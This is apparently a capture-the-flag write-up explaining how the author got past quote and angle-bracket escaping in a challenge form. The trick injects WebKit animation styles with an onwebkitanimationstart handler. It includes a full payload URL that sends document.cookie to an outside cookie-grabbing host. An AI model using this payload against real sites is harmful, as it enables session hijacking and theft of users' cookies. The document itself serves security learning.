The challenge link is here:

http://128.199.138.57/bc18126e-713b-4003-98d0-e4c8a531169d/

Basically it prints out a POST form that contains some parameters like URL, email and a textarea. If we submit a URL which isn’t starting with http://128.199.138.57 we’ll get a message which inform us that this site can receive complaints only for domain that they owns. After some testing I noticed that in the html for there is a hidden parameter which is ownername. But this HTML input hasn’t any hidden value there so why it doesn’t show up in the HTML form and in the HTTP POST parameters neither? Above there is an interesting piece of javascript code which is:

document.write('<p class="tinyText warning>Please include date of copyright expiration within provided evidence (such as '+new Date().getFullYear()+'-03-14)</p>');

If you pay enough attention you’ll see that the class attribute hasn’t the double quote (“) that close the class name so it basically fucking up the DOM and so the ownername field. But this lead to an interesting behavior: if we manage to manipulate the value attribute of that field we can try to get an XSS working there. We can accomplish this by passing parameters in the URL with GET method like ?ownername=blah&url=blah&etc…

But there is a problem.. <,>,‘,” are all escaped so how can we deal with this? After some several hours of researching throught the web I came across this (also as “hinted” by the HTML source): http://css-infos.net/properties/webkit . This CSS3 directives allow us to use onwebkitanimationstart attribute that permits to execute for us JS code when the animation start. I used also -webkit-animation-duration combo for a longer delay so I was sure to catch it with onwebkitanimationstart . Then just grab the cookie as a normal XSS:

url=http://128.199.138.57/bc18126e-713b-4003-98d0-e4c8a531169d/?ownername=style=-webkit-animation-name:fadein;-webkit-animation-duration:1s;%20onwebkitanimationstart=document.location=%22http://grab.cookie/test/cookie.php?c=%22%252bdocument.cookie;%20&owneremail=asd&phone=123&info=asd

Result:

128.199.131.179 nextlevel=http://128.199.128.57/6ad84da0-a1b2-4f9d-b6b6-de3c4a36bfb9/

This was surely an interesting challenge an learned this new XSS trick :)

Razor4x